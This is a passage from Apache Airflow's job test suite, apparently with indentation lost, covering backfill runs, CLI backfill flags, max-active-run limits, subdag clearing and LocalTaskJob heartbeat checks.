@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEqual(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEqual(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEqual(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for reschedule
ti.set_state(State.UP_FOR_RESCHEDULE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
